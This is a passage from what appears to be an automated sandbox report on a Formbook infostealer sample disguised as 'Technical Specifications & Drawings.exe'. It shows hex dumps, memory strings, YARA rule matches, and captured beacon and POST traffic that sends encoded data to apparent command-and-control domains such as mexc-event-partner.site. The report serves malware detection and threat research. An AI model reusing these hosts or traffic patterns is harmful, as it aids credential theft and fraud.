65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 
37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 3
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000013.00000002.517362036.000000000473B000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: unknown | HTTP traffic detected: POST /02pi/ HTTP/1.1 Host: www.mexc-event-partner.site Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.mexc-event-partner.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mexc-event-partner.site/02pi/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
          Source: unknown | DNS traffic detected: queries for: www.kirchhoff-darryl.com
          Source: global traffic | HTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.kirchhoff-darryl.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.tomoptique.fr Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.boshi-eg.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.esandcraic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.mexc-event-partner.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          Source: Yara match | File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Technical Specifications & Drawings.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
